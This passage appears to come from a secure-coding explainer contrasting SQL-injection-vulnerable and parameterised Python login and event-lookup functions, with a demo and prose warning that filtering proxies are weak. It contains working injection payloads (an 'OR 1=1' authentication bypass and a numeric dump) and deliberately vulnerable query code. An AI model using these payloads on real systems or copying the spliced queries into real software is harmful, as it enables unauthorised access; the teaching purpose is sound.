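                     [(1, "launch"), (2, "board meeting"), (3, "offsite")])
    return conn


def vulnerable_login(conn, user_name: str, user_pass: str) -> bool:
    """The admin/index.php pattern: values spliced into the SQL text.
    user_name = "admin' OR '1'='1' -- " turns the WHERE clause into
    user_name='admin' OR '1'='1' and comments out the password check."""
    sql = (f"SELECT COUNT(*) FROM admin WHERE user_name='{user_name}' "
           f"AND user_pass='{user_pass}'")
    return conn.execute(sql).fetchone()[0] > 0


def safe_login(conn, user_name: str, user_pass: str) -> bool:
    """Bound parameters: the driver sends the values separately from the
    query text, so quotes in the input are data, never syntax."""
    sql = "SELECT COUNT(*) FROM admin WHERE user_name=? AND user_pass=?"
    return conn.execute(sql, (user_name, user_pass)).fetchone()[0] > 0


def vulnerable_event_lookup(conn, raw_id: str) -> list:
    """The calendar_details.php?id= pattern. No quoting is involved, so
    raw_id = "1 OR 1=1" simply returns every row."""
    sql = f"SELECT title FROM events WHERE id={raw_id}"
    return [row[0] for row in conn.execute(sql)]


def safe_event_lookup(conn, raw_id: str) -> list:
    """Validate the type first (ValueError on anything but an integer),
    then bind it; either step alone would already defeat the payload."""
    event_id = int(raw_id)
    sql = "SELECT title FROM events WHERE id=?"
    return [row[0] for row in conn.execute(sql, (event_id,))]


if __name__ == "__main__":
    conn = sample_db()
    bypass = "admin' OR '1'='1' -- "
    print("vulnerable login with payload:", vulnerable_login(conn, bypass, "wrong"))
    print("safe login with payload:      ", safe_login(conn, bypass, "wrong"))
    print("vulnerable lookup '1 OR 1=1': ", vulnerable_event_lookup(conn, "1 OR 1=1"))
    print("safe lookup '2':              ", safe_event_lookup(conn, "2"))
```

The "filter malicious characters using a proxy" workaround offered in several of the posts is weaker than it looks: the numeric injection above contains no quote characters at all, and encoding variations and database-specific syntax give an attacker many ways around a blacklist. Prepared statements with bound parameters, as in `safe_login` and `safe_event_lookup`, fix the bug rather than hiding it.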